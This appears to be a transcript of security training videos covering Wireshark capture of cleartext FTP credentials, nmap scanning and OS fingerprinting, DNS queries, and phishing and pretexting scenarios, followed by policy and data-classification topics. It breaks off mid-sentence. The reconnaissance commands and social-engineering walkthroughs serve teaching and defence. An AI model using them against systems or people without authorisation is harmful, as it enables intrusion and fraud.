That's the one I want to capture traffic on. So I'll just go ahead [Dan refers to Microsoft interface which has
the following IP: 192.168.1.157. It contains 108 packets.] and click Start. And, when I do that, it starts
capturing the network traffic. I can see the Source where it came from, the Destination where the traffic is
going to, the Protocol, and additional Info.
Now, when I am happy with that, I can go ahead and I'll click the fourth button from the left in the toolbar to
stop the capture. And, as we stated, we could Save this for later analysis. [He clicks the Save option from the
File menu in the menu bar.] Now, if I select an individual packet in this listing, in the middle of the screen, I
can see the hardware frame – in this case, Ethernet II – where I can see the Source and Destination hardware or
MAC addresses that's Layer 2. Then I can see the IP header, the Internet Protocol header, where I see things
like the Time to live – the TTL. And, as I scroll further down, the Source and Destination IP addresses – those
are Layer 3 addresses.
Now let me just collapse the IP header. Then I see that this is a UDP transmission – User Datagram Protocol.
And again, I can see here the Source port and the Destination port. So again, that's Layer 4. And then I see
Data. Now the Data is the payload of the actual contents of the packet. Everything else that we've just looked
out is used to get the packet to where it's going and back. So, in the data, we have the payload. Essentially that
would map, generally speaking, to Layers 5, 6, and 7 in the OSI model depending exactly on what's happening.
So our frame here where we see our MAC addresses – Layer 2; the IP header – Layer 3; the UDP header –
Layer 4; and the payload or data in the packet – Layers 5, 6, and 7 of the OSI model.
So, when you are capturing network traffic, we have to understand the distinction between hubs versus
switches. Because, in the hub environment, all the devices plugged into the hub can see all of the traffic
transmitted by all other devices plugged into that hub. Now, with an Ethernet switch, it's different. Two
communicating devices can see their own unicast transmissions to each other, but they don't see other unicast
transmissions for other stations on the same switch. Then we'll see broadcasts to multicasts, but that's about it.
So, if you're using a network switch, which pretty much everybody would be, then you have to think carefully
about which physical port your device is plugged into if you want to capture network traffic because if your
switch supports it, you want to make sure you configure port mirroring, essentially, so all network traffic in
other ports is copied to the one where you are capturing traffic. Otherwise if not, when you capture network
traffic, you might only be seeing essentially any traffic related to your station, again, other than broadcasts and
multicasts. So the switch monitoring port then is very important.
We should also consider the fact that if we are interested in capturing traffic going through a router, then
maybe that's where we would run our packet capturing tool. A multihomed device is one that's got at least two
network interfaces. So, if we've got a server acting as some kind of a firewall, then we might run our packet
capturing software there to capture traffic entering or leaving the network, same as a router. We have to watch
out for ARP cache poisoning. This is where a malicious user can update the MAC address in client ARP cache
tables in memory with a rogue MAC address – in other words, with their MAC address for their fake router.
Now that can be used for good to redirect people through a more efficient router or for evil where a malicious
user is really only interested in getting all the traffic funneled to one location so they can capture it all even in a
switched environment.
When you capture network traffic, you can configure a capture filter so that you are filtering what you are
capturing in the first place or you could capture everything that your machine can see on the network and then
you can configure a display filter to filter out what you are looking at. So for example, if you only want to see
SMTP mail traffic from a certain server, you can easily do that. So for example, here we see in our first
statement, we are filtering by an IP source address. [ip.src == 10.43.54.65] The second example here – we
can filter by a TCP port number equal to 25, which would be SMTP or we might look for ICMP
traffic. [tcp.port eq 25 or icmp] In the third example, we're taking a look at the first three portions of a
hardware MAC address to ensure they match what's been filtered for here. [eth.addr open square bracket 0:3
close square bracket ==00:06:5B] Now these are filter statements that we might use in a tool such as
Wireshark. In this video, we discussed packet capturing.
[Topic title: Capture FTP and HTTP Traffic. The presenter is Dan Lachance.] One of the many tools available
for reconnaissance is a network analyzer, otherwise called a packet sniffer. Here, in my screen, I've
downloaded and installed and started the free Wireshark application. [The Wireshark Network Analyzer
window opens. Running along the top of the window is a menu bar. Below this, there is a toolbar.] Now, to
start a capture, I'm going to click the leftmost icon in the toolbar, which lists my interfaces on this machine.
The second of which has some packet activity. So I'm going to start capturing on that by clicking the Start
button. Now I'm going to remove any filtering information to make sure that we are capturing all network
traffic. I'm then going to connect to a web server at 192.168.1.162. [Dan enters the following in the address
bar of the web browser: 192.168.1.162. Then the Windows Server web page opens. It displays the Internet
Information Services section.] And, after a moment, we can see the web page pops up. And, in another web
browser tab, I'm going to use the ftp:// prefix in the address bar to connect to an FTP server running on that
same host.
Now the FTP server here requires authentication. [The Authentication Required dialog box opens. Dan enters
his login credentials.] So I'm going to go ahead and provide the credentials. And then it logs me in. And I can
see the index listing of files at the root of the FTP server. There are none because it's an empty FTP server, but
it did let us in. Let's go back and stop the Wireshark capture. And then let's take a look at both the HTTP and
the FTP traffic that we just captured. Here in Wireshark, I'm going to click the fourth icon from the left to stop
the packet capture. And I'm going to go ahead in the Filter line up there and type http. [In the Wireshark
window, below the toolbar, there is Filter search bar. He enters http in the Filter search bar.] So we only are
viewing HTTP packets. Now here I see a number of packets. Each line here is a packet.
When you select it in the middle of the screen, you can see the packet headers. [The window is divided into
three sections. The first section lists the number of packets in a tabular format with following column headers:
Time, Source, Destination, Protocol, and Info. The second section displays the packet headers. The third
section displays the hexadecimal and the ASCII representation of the packets.] And, at the very bottom in the
thirdmost panel at the bottom, you can see – on the left – a hexadecimal representation of the content or panel
out of the packet and, on the right, an ASCII representation. But what we could do is modify our Filter. Let's
say we're going to add ip.dst==192.168.1.162, which we know is the IP address of our web server. [He enters
the following in the Filter search bar: http and ip.dst==192.168.1.162.] And here we happen to have one
captured transmission. And let's take a look at the headers – so having that packet selected. It's an HTTP
packet. We can see that in the Protocol column. In the Source column, we can see where it came from. That's
my local client address. And the Destination – in this case, the web server.
So the Ethernet II frame has Layer 2 addresses – in other words, MAC addresses. If we take a look at the
Internet Protocol or IP header, it's got a number of fields, but it does include the Source and Destination or
Layer 3 IP addresses. The Layer 4 header is the Transmission Control Protocol, TCP header, where we've got a
Source port. In this case, because this transmission is stemming from a client, it's a higher-level port, but it's
destined for porting because it is getting to the web server. And finally of course, we are going to see some
more detail, in this case, for the Hypertext Transfer Protocol, which – depending on how you are connecting
and whether or not it's encrypted – would apply the Layers 5, 6, and 7 of the OSI model. So we can see down
below here...in the ASCII representation of the payload, we can see that we're using a Chrome browser. And
we can see that it's just basically requesting some icon files and so on from the web server.
Let's go up in the Filter line and type in ftp and examine that traffic. [He enters ftp in the Filter search bar.] So
I'm going to go ahead and press Enter. And, after a moment, it will filter it for FTP. We can see there is a
communication between the FTP server, which is also the web server's IP address, with my local station. [He
refers to the IP address 192.168.1.162 which is present under the Source column and to the IP address
192.168.1.157 which is present under the Destination column.] And, having an FTP packet selected, if we
kind of break down the headers like we did with HTTP, you'll find it's pretty similar. So we've got our Ethernet
frame with the Source and Destination MAC addresses. Again, that applies to Layer 2 of the OSI model. The
IP header – by just Layer 3, it's got various fields including the Time to live or TTL, which will vary from one
operating system to another.
Here with Windows, it starts at 128. And it gets decremented by one as it goes through each router along its
path. But we can also see in the IP header the Source and Destination IP address yet again. Just like we did
with HTTP and just like with HTTP again, we've got a Layer 4 TCP header – Transmission Control Protocol.
Of course, the port information is going to be different for FTP than it will be for a web server. And finally,
we've got the actual application header for File Transfer Protocol(FTP) here, which would apply again
depending on how it's used to Layers 5, 6, and 7 of the OSI model. So we can see any information related to
that.
Now what's interesting is even without delving down into the payload of the package, just by looking at the
Info column up here in Wireshark on the right, I can see that it prompted me for a username – which was
specified as administrator – it then asked for a password. And the password is in clear text here. There is no
challenge. If anyone can be on the networking, capturing traffic while you're using clear text type of credential
passing systems like FTP, it's child's play to retrieve that information. Now, to protect FTP communications,
you might use IP Secure. Everything would be encrypted, FTP or not. You might use a VPN tunnel through
which you do FTP traffic.
That would be safe. Or maybe you use a secure FTP solution, perhaps, using FTP over an SSH connection. But
FTP by itself is not considered safe. Now you can apply this kind of rule set that we've talked about in this
demonstration to capturing pretty much any type of network traffic to begin interpreting what you're looking
at. It's one thing to capture the traffic, the skill comes in being able to interpret what you are seeing. And, to do
that, you've got to understand the OSI model and the TCP/IP protocols suite, MAC addresses, IP addresses,
and so on. In this video, we learned how to capture and analyze FTP and HTTP traffic.
[Topic title: Network Infrastructure Discovery. The presenter is Dan Lachance.] In this video, I'll demonstrate
how to perform network discovery using Linux. Now there are plenty of tools for both Windows and Linux.
Some are command line based. We will be using the nmap command in Linux. But, in both Windows and
Linux, there are also graphical tools that can map your network for you. Some are free, some are not. [The
root@kali:~ window is open.] So let's start here in Linux by typing nmap. And then I'm going to pop in the IP
address of a specific host on the network. Now, given I am putting this host address in, it means I must already
know what exists and that it's up and running. But we will talk about what to do when you don't know that
already. So, when I press Enter, [Dan executes the following command: nmap 192.168.1.200.] what nmap is
going to do is start to show me, well first of all, whether or not that host is up and running. And we know that
host is up and running because it's showing us open ports on that host. Now here we see a number of TCP
ports that are open. And, if we take a look, we'll see ports 135/tcp, 139/tcp, 443/tcp, 445/tcp, 3389/tcp, which
is for remote desktop. This smells like a Windows machine, specifically a domain controller.
Now we can't be sure without further investigation, but that's what reconnaissance is about. It's about scanning
one or more hosts – in this case, an entire network or multiple networks – as a starting point, which serves as a
launchpad for further investigation for things that look interesting. Now this could be used legitimately so we
can identify any weaknesses on our network. Or it could be used by malicious users to pinpoint what they are
going to exploit or attempt to exploit. Let's clear the screen with a clear command. And let's run nmap again,
except this time I'm going to use the –O command, which allows me to do OS fingerprinting. And again, I'm
going to give it a single-host IP address. So I'm going to go ahead and press Enter. [He executes the following
command: nmap -O 192.168.1.200.] Now this may take a moment or two, but the idea is that it's going to take
a look at open ports and also at the type of responses it gets in terms of packets to try to guess at what type of
OS it is. And notice down below, it's telling me that it's probably Windows 7 Server 2012 or Windows 8.1. In
fact, that machine is running Windows Server 2012 R2.
So again, this is part of reconnaissance. It is not only seeing what nodes are up on the network or what ports
are open, which services are running, but also what operating systems are running. It is all about information.
It really is power when it comes to gathering information. And that's really the first thing that happens when an
attacker starts doing their homework when they have chosen a victim. And, maybe in some cases, it helps them
choose a victim. Often, attackers will go for the lowest hanging fruit, it happens. So the next thing I'm going to
do is I'm going to clear the screen and then I'm going to run nmap. I'm going to do a ping sweep so I can see
which hosts are up and running on the network. To do that, I will use –sP. And then I'm going to tell it
192.168.1.0 – that's my network address – /24. That's the number of bits and subnet mask expressed inside a
format. So basically, it's a ping sweep. [He executes the following command: nmap -sP 192.168.1.0/24.] And
what we want to happen is each host to respond with an ICMP Echo Reply.
Now, of course, if hosts are fully firewalled, then this is going to be an issue. We're not going to get much
back. But what I'm starting to see is a list of hosts that are up and running. I am seeing some details about
whether it's a VMware device or so on. And I'm also able to see the MAC address. So, down at the bottom, it
says nmap is done, 256 IP addresses. And, out of that, 11 hosts are up and running. Again, we know now
what's active on the network. And, from here, we might pick on some of them and do OS fingerprinting or get
a list of ports that are open on those devices. In this video, we learned how to perform network discovery in
Linux.
After completing this video, you will be able to explain harvesting techniques.
Objectives
[Topic title: E-mail and DNS Harvesting. The presenter is Dan Lachance.] In this video, I'll talk about email
and DNS harvesting. Both email and DNS harvesting are forms of reconnaissance. They can be either
manually invoked by perpetrators or it could be automated. Which is usually the case, through bots. Through
some kind of automated software which often can be delivered through malware. Email and DNS harvesting is
illegal in some jurisdictions around the world. Because what we're doing is gathering sensitive information and
potentially using it in a way that the owner of that information did not consent to. Email harvesting is the
process of obtaining email addresses from websites, from various network services. Such as an LDAP server
that might serve as a centralized contact list or public forums that might list email addresses, like social media
sites. And also malware that can read infected user's contact lists. Now why would someone want to harvest
email addresses? Well, it could be used for bulk email lists to try to send unsolicited spam messages or trying
to sell a service or a product of some kind. That's one way it can be used.
Another is for phishing, spelled with PH as a prefix. Where we, essentially, get lots of people's email addresses
and send out some kind of a scam email, maybe with a file attachment. And trick the user into opening the
attachment, which therefore infects their machine. Or maybe the phishing scam is used to trick the user into
clicking a link and providing sensitive information, like banking details. In this example, [The screenshot of an
e-mail message from Western Union Support Team is displayed on the screen.] I've got an email message that
was received about Western Union money transfers, which I never sent. Now, the idea is that this is a scam
where there's a file attachment. And, in the body of the message, I'm being instructed to detach the Western
Union file attachment so that I can reclaim the funds that I sent. When, in fact, I never did. So, it's always a
good idea to be somewhat suspicious and cynical when you get email messages that your gut instinct tells you
don't feel right. Because this is probably an email message that would infect my machine. Many websites these
days don't post email addresses and this is a good thing. Instead, if we need to send an email to someone
related to the website, we would fill in a form. And then that form is sent to the server where there's a server-
side script that sends the email.
So, the email address then is never exposed to the client web browser. DNS harvesting is the process of
obtaining DNS records. DNS is a name look up service where we normally do a query against the server,
giving it a name, such as www.google.com. And it returns the IP address. Well, private DNS servers hold
names and IP addresses which could reveal a lot about the internal network structure of a company. The zone
transfer is the transfer of records between different DNS servers. Now in some ways, that can be captured with
network capturing tools. At the same time, there are some command line tools built into operating systems,
like the old nslookup, the name server lookup command. Which can be used to query DNS or to conduct its
own transfer. Now that's not to say nslookup is a tool that's only used for bad purposes. It can also be used for
troubleshooting or just to test that DNS is functioning correctly. So, for example, here at the the Windows
command line. [The Command Prompt window is open.] I can type nslookup to start the nslookup tool in
interactive mode where I prompt the changes. [Dan executes the following command: nslookup. The following
output is displayed: Default Server: google-public-dns-a.google.com, Address: 8.8.8.8.] And if I wanted to, I
could simply type in something I want to query, like www.google.com and it will return the IP addresses for
that web server. Of course, what I could do is change the type of record I'm querying. For instance, I might
type set type=mx. That's a mail exchanger record. And then I might type whitehouse.gov. So I want to see
SMTP mail hosts related to email addresses at whitehouse.gov. And of course, I can see I have numerous
listings for hosts listed down below. The good news is that DNS servers can be configured to limit zone
transfers to specific hosts. Also, firewalls can block DNS queries even from specific sources. Because we
know that DNS queries from clients come in on UDP port 53. Now zone transfers between DNS servers
normally occur over TCP port 53. Now DNS harvesting is also often referred to as DNS enumeration. Because
that's really what it's doing. In this video, we discussed email and DNS harvesting.
After completing this video, you will be able to recognize social engineering techniques.
Objectives
[Topic title: Social Engineering and Phishing. The presenter is Dan Lachance.] In this video, we'll discuss
social engineering and phishing. Social engineering is yet another form of reconnaissance as is phishing spelt
with a "ph" instead of an "f". And we're not talking about the relaxing type of phishing here. Social
engineering is really the equivalent of deceiving people. It's trickery. Phishing is a form of social engineering.
Now the goal of social engineering and phishing is to have victims divulge sensitive information. You're trying
to fool people to do that. So that sensitive information would include things like usernames, passwords, bank
account information, and so on. So the victim then believes in the legitimacy of the perpetrator. Perpetrators
then exploit people's fears often. So there might be some kind of a social engineering or phishing scam where
we pretend to be law enforcement tracking Internet activity. And so there is a pop-up that might display on the
user's screen. And, because people are afraid of imprisonment, if there is a message that says to send money to
a certain PO number or through Western Union Money Transfer, they may actually pay up, it happens.
Another way that perpetrators can exploit people's fears are from the tax ban.
So there might be an e-mail phishing scam whereby we claim to be the government and that income taxes are
past due. And that to avoid penalties and higher interest charges on the outstanding balance, people need to pay
immediately using your credit card or by sending a money transfer. Again, playing on people's fears. So here is
an example of social engineering. We are in step one. A malicious user calls an unsuspecting victim, claiming
to be a telephone company technician that needs to come on-site to fix a problem. Now, of course, the
malicious user will have done their homework. They will have performed reconnaissance so they know who
the telephony provider is for this specific victim company they are targeting. And they might get to know the
name of the receptionist, know what kind of telephony services the company uses, and so on. Number two –
the victim would then set the appointment date and time. They would probably have no reason to believe that it
was a scam if things were done properly by the malicious user.
In step three – the malicious user shows up, dressed in the appropriate clothing, carrying the appropriate tools.
So they look like the real deal. In step four, the victim would then let the malicious user into, in this case, a
wiring closet or a server room to fix the – quote, unquote – problems with the telephone system. Now, in step
five, the malicious user has physical access to network infrastructure gear. That is a problem. In a phishing
example, in step one, a malicious user would send an e-mail message to a harvested e-mail address. Now, of
course, this would be automated, it would be sent to thousands of e-mail addresses that were harvested, in most
cases, probably illegally. The message would appear to come from a reputable bank, for instance, and the
message would ask the user to reset their password and provide a link to a site. And you know, even if the user
follows that link, it looks like their banking site – it looks legitimate. Really, it's a fake web site that looks like
the real thing that's under control of the malicious user. So then, in number two, the victim clicks the link and
enters sensitive banking information which, of course, is captured by the malicious web site.
So the malicious user's web site would then display a message to the user telling them that the bank is
experiencing technical difficulties. So, of course, you can't actually show them their accounts and that the user
should try again later. Of course, when the user tries again later, it's too late. In this example, I've received an
e-mail message from what appears to be my bank. [The screenshot of an e-mail message is displayed.] But, if
we will look carefully at who it says it's from, at the top of this e-mail message, the e-mail address looks like
it's coming from some kind of an educational institution. And the message is telling me that someone tried to
access my bank account from a device on a certain date, from a certain IP address in Canada, and that it wasn't
successful. And so due to this, the bank has locked my account and everything is frozen, all my funds are
frozen. So to unfreeze them, all you have to do is click this link and then everything will be good.
Now this smells a phishing scam and most certainly it is. So even, if this happens to be a bank you actually do
business with, do not click any links. You would need to actually go through the normal channels you would
do to sign in to ensure that nothing is wrong with your account. You know, it doesn't matter what type of
security controls technically you have in place, if people aren't aware of this type of scam, they can circumvent
most of your security controls and still wreak havoc on the network by infecting machines or divulging
sensitive information. So user awareness and training is absolutely number one. So what can we do about
social engineering and phishing issues?
Well, technically there are a few mitigating controls like e-mail spam filters can help, but at the administrative
mitigation control level is where we really focus on, as we've emphasized user training and awareness. This
might be done through lunch and learns, through documentation, part of orientation for new employee hires,
and so on. We might even have posters in the workplace, something that's creative and fun and interesting that
gets the point across about these potential security problems. In this video, we talked about social engineering
and phishing.
[Topic title: Acceptable Use Policy. The presenter is Dan Lachance.] In this video, we'll talk about Acceptable
Use Policy. Organizations will have numerous security policies related to how business processes are to be
conducted within the company and also how IT systems are to be used. So the Acceptable Use Policy then is
part of the overall organizational security policy. Now user training and awareness is crucial in order to make
this information known to employees within the company. There needs to be user acknowledgement of
acceptable use policies for IT systems during the employee on-boarding process, when they're newly hired.
We might also consider the use of logon banners on our devices on the network, including Windows and Linux
workstations, so that prior to user logon, there is a banner or an alert that pops up that states something to the
effect that the machine should only be used for business purposes. So the proper use of IT systems then within
the company is part of the Acceptable Use Policy.
The Acceptable Use Policy is a document. And you should really make sure you involve legal counsel when
structuring this for an organization. So, an example of this, in terms of a structure, would be having a purpose
of the Acceptable Use Policy which normally is to protect employees and business interests, than the scope of
it. For example, we might have an e-mail acceptable use policy versus a VPN acceptable use policy.
Then, of course, it would define unacceptable use. In the case of e-mail, that would be harassment of any kind
sent to others through the mail messaging system. There would also need to be a section that lists
consequences. And in case of e-mail unacceptable use, it might be suspension from work. Of course, there
needs to be a definition of terms like there would be in any type of longer document, especially a legal
document.
The e-mail acceptable use policy might include things like no harassment, including sexually harassing e-mail
messages or anything involving racial slurs through e-mail. The Internet acceptable use policy might include
things such as no visiting of pornographic sites. Social media acceptable use policies might prohibit the use of
Facebook or Twitter and other social media. However, in some cases, maybe it's only allowed during breaks.
The consequences – there could be legal prosecution in some cases. It depends on the nature of the infraction.
So, for example, adults viewing adult pornography is technically not illegal in most parts of the world, but
obviously it's unprofessional at work. So even though they might be suspended or demoted or potentially lose
their job, there might not be any type of legal prosecution beyond that.
In this video, find out how to identify details within data ownership and retention policies.
Objectives
[Topic title: Data Ownership and Retention Policy. The presenter is Dan Lachance.] In this video, I'll discuss
data ownership and retention policy.
Data ownership relates to intellectual property or IP. Now, at the industrial level, this would include things
such as – patents and trademarks. At the artistic level, it would include things like musical compositions, films,
and artworks that are protected by copyright.
Fair use means that we can use an excerpt of intellectual property while giving attribution to the owner or
creator. So, for example, we might have a search result in a search engine that shows a thumbnail of a
copyrighted image, but not the full size or full scale picture. We also have to think about where data is being
stored when it comes to intellectual property. Whether it's stored on-premises or in the cloud, and what laws or
regulations apply to the data where it's stored.
There are then archiving requirements for data retention. Now there might be laws or regulations in our
specific industry that dictate how long we must keep certain types of records for. Data backups deal with the
storage location which might have to be on-premises or off-site elsewhere like the storage of off-site tapes, or
they could be stored in the public cloud.
Now, in some cases, storage of data in the public cloud could be prohibited unless the public cloud provider
has a data center in the country of origin of that same data and as long as it's manned by personnel that are
residents of that same country. So it's very important that you get legal advice when determining where to store
sensitive data especially if that related to customers whether it's health information, financial information,
address information, and so on.
We also have to consider the cost that's related to data storage be it on-premises or in the cloud especially
when it's being retained for periods of time. Legal discovery can be difficult without a comprehensive data
retention policy. E-discovery is a term that relates to the electronic discovery of digital data that could be used
in court proceedings.
Often with data retention, it's policy-driven automation that categorizes and migrates data that is no longer
considered to be live and needed right now and stores it instead in long-term storage. Now often, and this is
true also on the public cloud, long-term storage is slower. So it might be older magnetic hard disks as opposed
to the faster solid-state drives. And as such it's cheaper.
So even most public cloud providers will charge a lesser rate to store things long-term for archiving than to
store data that's frequently accessed. The proper disposal of sensitive data after the retention period has been
exceeded is crucial. So again there might be regulations that require certain data sanitization techniques to be
applied to make sure no data remnants remain.
In this video, learn how to identify details within data classification policies.
Objectives
[Video description begins] Topic title: Data Classification Policy. The presenter is Dan Lachance. [Video
description ends]
In this video, I'll go over data classification policy. Data integrity relates to how trustworthy and authentic data
is considered. This can be assured in various ways. At the technical control level, file hashing is used to take
the unique bit-level data and apply it against an algorithm that results in unique value. That unique value is
called a hash. Now when we run that algorithm against that same data in the future, if there's a change, the
hash value will be different. So we'll know that something has changed.
Administrative controls, including things like separation of duties can also assure data integrity or business
process integrity. Separation of duties ensures that no single person has control of an entire business process
from beginning to end, especially as it relates to IT and security. Mandatory vacations not only ensure that
people are refreshed.
But, also while they're on vacation, people filling their roles will be able to notice any anomalies if there are
any. Not only anomalies, but also inefficiencies in how things are done. Change management processes are a
structured and organized way to apply changes in an organization. Now as it relates to IT, it's important that
this be outlined and known to related personnel so that changes are applied in a controlled manner and we have
a way to roll back out of changes if there's a problem. Dual control requires that at least two people be present
in order to complete a process.
So, for example, if our data backups are encrypted, we might require two technicians to be present – each
having a part of a decryption key. And when those two parts are put together, we have the single key that's
required to decrypt that backup. Cross-training can also be very important. In the IT world, technicians are
used to reducing single points of failure, whether that's in a power supply, at the disk level, server level, and so
on.
At the personnel level with cross-training, we've got more than one person that are able to perform a duty so
that if one person is unable to perform a duty or if they leave the organization or they're busy on another
project, we've got somebody else that can perform that task. Succession planning is also crucial so that we
have got someone in mind that we train over time that can fill the shoes of somebody that will be moving on to
other departments, other projects, or even perhaps moving into retirement. A data classification policy
identifies different types of data. Now why would we want to do that? Why can't all data be treated the same?
Well, some data is more sensitive than other data. And so, with the data classification policy, we might look
into database records or files to determine if there is something sensitive like financial transactions, health
records, whether records or files contain Personally Identifiable Information or PII. Things like e-mail
addresses or social security numbers – that's all considered PII. And in some cases, we might be required due
to regulations or laws, to encrypt data that is considered sensitive. Also, this data classification can be related
to data retention requirements. So perhaps data that is not considered PII – Personally Identifiable Information
– doesn't need to be retained. Whereas financial transactions, due to the industry we're in might need to be
retained for a number of years.
So this is an ongoing task. The reason this is true is because as we get new records or new files placed on a file
server, they need to be classified. So we need some way to determine does that new data contain financial
information, health information, and so on. And, as such, it should be classified accordingly. So, if it's got
financial information in it, it should be classified in some way that we can identify that and that would go
along with our data retention of financial information for numerous years. We can automate data classification.
It's not as if somebody has to be watching for any new or changed database records or files to flag them
manually.
So we can automate the classification through metadata tagging. Metadata is extra information that gets stored
with existing data. As an example, Microsoft's File Server Resource Manager is a role service in the Windows
Server Operating System that does just this. Let's go take a look at it right now. On my file server, I've gone to
Local Disk (C:) into the Contracts folder where I've got a file called Contract_A. Now, if I right-click on a file
here in the Windows Server OS and go to the Properties option, if there's a Classification tab visible
[Video description begins] The Contract_A Properties dialog box is open. It includes tabs such as General,
Classification, Security, and Details. [Video description ends]
because there may not be, it means that the File Server Resource Manager option is installed.
[Video description begins] He clicks the Classification tab. Under this, there are two sections. The first section
displays the added property's name and value. In this, the Department property is added with the Value
(none). The second section is Value. It displays the values and their description that can be added to a
property. [Video description ends]
So clearly it's installed here. So I'm going Cancel all of that. On my server I'm going to go to my Start button
and look for file server. And what I want to do here is run the File Server Resource Manager tool. Now this
does numerous things,
[Video description begins] The File Server Resource Manager window opens. It is divided into three sections.
The first section is navigation pane. In this, the File Server Resource Manager (Local) node is selected by
default. It includes subnodes such as Quota Management, File Screening Management, and Classification
Management. The second section displays the information on the basis of the selection made in the first
section. The third section includes the File Server Resource Manager expandable node. [Video description
ends]
but we're only interested here in Classification Management. So I'm going to click under Classification
Management on the left, on Classification Properties. Now over on the right, I see any existing Local
properties that are tied to
[Video description begins] In the navigation, under the Classification Management subnode, he clicks the
Classification Properties option. As a result, its information is displayed in the second section. The second
section displays the information of local properties in a tabular format. The table provides information
regarding the Scope, Usage, Type, and Possible Values of the local properties. [Video description ends]
the specific server that can be used to flag files and any Global ones come from Active Directory. For example
here, there's a Department Global property that we can use to flag files and tie them to a department. Now we
can also build our own properties. If I were to right-click on Classification Properties on the left, I could
choose to Create Local Property. I'm going to make one here called FinancialData.
[Video description begins] The Create Local Classification Property dialog box opens. It contains a General
tab. Under this, there are the following fields: Name and Description, which are text boxes and Property type,
which is a drop-down list box. In the Name text box, he enters FinancialData. [Video description ends]
Down below for the Property type, I'm going to choose Yes/No. So either it is or is not financial data. But
notice I've got other data types here like Number, Multiple Choice List, String, and so on. Then I'm going to
click OK. And notice that the FinancialData Local property now shows up in the list.
[Video description begins] The FinancialData property gets added to the table of the local properties. [Video
description ends]
Let's go back to our file. So I'm going switch back to the Windows Explorer tool. I'm going to right-click on
the Contract_A file again and go back into Properties. And under Classification, notice that we've got both
Department and FinancialData available here. So Department for instance is selected.
[Video description begins] The Contract_A Properties dialog box opens again. Under the Classification tab,
Dan refers to the FinancialData property that gets added in the first section under the Description
property. [Video description ends]
And down below, I can choose which department that this file might be tied to. Now of course, I'm doing this
manually. We'll talk about the automation in a moment. So maybe this is related to the Finance department. So
up above, we see Department equals now Finance.
[Video description begins] He selects the Department property in the first section. Then in the Value section,
he selects Finance. This value gets added in the first section against the Description property. [Video
description ends]
For FinancialData, I can either choose Yes or No or None value. So again, I'm doing this manually. But, if I
deem that there is financial data stored in this document, I would choose Yes.
[Video description begins] He selects the FinancialData property in the first section. In the Value section,
three radio buttons appear: Yes, No, and None. He selects the Yes radio button. [Video description ends]
So we can now see the file is flagged for the Finance department. And yes, it does have FinancialData. So I'm
going to click OK. But what about automating that? Well, let's go back to the File Server Resource Manager.
On the left, I'm going to right-click on Classification Rules to create one.
[Video description begins] The File Server Resource Manager window opens again. Under the Classification
Management subnode, he right-clicks the Classification Rules option. As a result, a shortcut menu appears
from which options can be selected. He selects the Create Classification Rule option. [Video description ends]
[Video description begins] The Create Classification Rule dialog box opens. It includes various tabs such as
General, Scope, and Classification. Under the General tab, in the Rule name text box, he enters Rule1. [Video
description ends]
And under the Scope tab, down below, I'm going to click Add. I have to tell it where I want to scour or scan
the file server looking for files that might be considered financial data files. So I'm going to tell it to scan drive
C under the Classification tab. I'm going to make sure it's set to Content Classifier. And down below I'm going
to click the Configure button.
[Video description begins] He clicks the Classification tab. Under this, there are two sections: Classification
method and Property. The Property section includes the Configure button. [Video description ends]
What I'm going to look for here is a String value within files.
[Video description begins] The Classification Parameters dialog box opens. It contains the Parameters tab.
Under this, there are the following two sections: Specify the strings or regular expression patterns to look for
in the file or file properties and File name pattern (optional). In the first section, the content is displayed in a
tabular format with no entries. The following column headers are displayed: Expression Type, Expression,
Minimum Occurrences, and Maximum Occurrences. Under the Expression Type column header, there is a
drop-down list box. [Video description ends]
Let's say that if it's got usd for U.S. dollars, I consider that to be a financial file.
[Video description begins] Under the Expression Type column header, he selects the String option from the
drop-down list. Under the Expression column header, he enters usd. [Video description ends]
So we can get much more detail than that with our expression, but that's what we're going to go with in this
example. So I'm going to click OK. Now when we do find files on drive C that contain USD, I want to flag it
as FinancialData equals Yes. I'll choose that from here.
[Video description begins] He switches back to Create Classification Rule. Under the Classification tab, in the
Property section, there are two fields: Choose a property to assign to files and Specify a value. Below the first
field, there is a drop-down list box, he selects the FinancialData option. As a result, in the second field, the
Yes option gets auto filled. [Video description ends]
And then I'll click OK. Now at any point in time over on the right in the Actions panel, you see you can Run
Classification With All Rules. That's still manual. What I could do is Configure Classification Schedule. So I
could enable a schedule,
[Video description begins] In the Actions section, he clicks the Configure Classification Schedule option. As a
result, the File Server Resource Manager Options dialog box opens. It includes various tabs such as Email
Notifications, and Automatic Classification. The Automatic Classification tab is selected by default. It includes
the Schedule section which contains an Enable fixed schedule checkbox. [Video description ends]
determine which days of the week I want this to run on and at what time, and it will run my classification rules
for me. Data classification can also go hand in hand with authentication. So depending how people
authenticate will determine what type of data they'll be able to get to. For example, sensitive data might require
Multi-Factor Authentication that otherwise would be unavailable to users. Role-based access to data is very
common where we limit data access to job roles on a need to know basis. This is most often implemented
through the use of groups that might have permissions to files flagged as being FinancialData. In this video we
talked about data classification policy.
[Topic title: Password Policy. The presenter is Dan Lachance.] In this video, we'll take a look at password
policy. Password policies are important and they're defined within an organization to determine things like
how long passwords can exist before they need to be changed, how complex passwords need to be, and so on.
Here, Windows Server 2012 – let's take a look at that in group policy where we can centrally define password
settings for all users in the Active Directory domain. To begin, I'll click on the Start button and I'll type in
group. Now when the Group Policy Management tool pops up, I'll go ahead and click on that to start it. Now
once we're in the Group Policy Management tool [The Group Policy Management window opens. It is divided
into two sections. The first section is navigation pane. The second section displays the information on the basis
of the selection made in the first section. In the first section, under the Group Policy Management expandable
node, there is Forest:fakedomain.local subnode. Under this subnode, there is Domains subnode. Under this,
there is fakedomain.local subnode. Under this subnode, there is Default Domain Policy option. Its information
is displayed in the second section.] in the left-hand navigator, I'm going to right-click on the Default Domain
Policy, GPO or Group Policy Object. And I'm going to choose Edit.
Here within the Default Domain Policy on the left, [Now the Group Policy Management Editor window opens.
It is also divided into two sections. This time in the navigation pane, under the Default Domain Policy
[SRV2012-1.FAKEDOMAIN.LOCAL] Policy expandable node, there are the following two subnodes:
Computer Configuration and User Configuration.] I'm going to go down under Computer
Configuration. [Under the Computer Configuration subnode, there are the following two subnodes: Policies
and Preferences.] So I'm going to expand Policies. Then I'm going to expand Windows Settings. And finally
under that, I'll open up Security Settings. Now this is where we're going to see Account Policies. And, if I even
expand that, finally it reveals the Password Policy. If I select that on the right, I see all the individual settings
like Enforcing password history.
Here it's set to remember the last 24 passwords. So the idea here is we don't let people reuse passwords
because that essentially means the same password is in effect for longer periods of time which reduces security
for that user account. Here the Maximum password age is currently set to 42 days. [In the second section, Dan
clicks the following individual setting: Maximum password age. As a result, the Maximum password age
Properties dialog box opens. It contains two tabs: Security Policy Setting and Explain. Under the Security
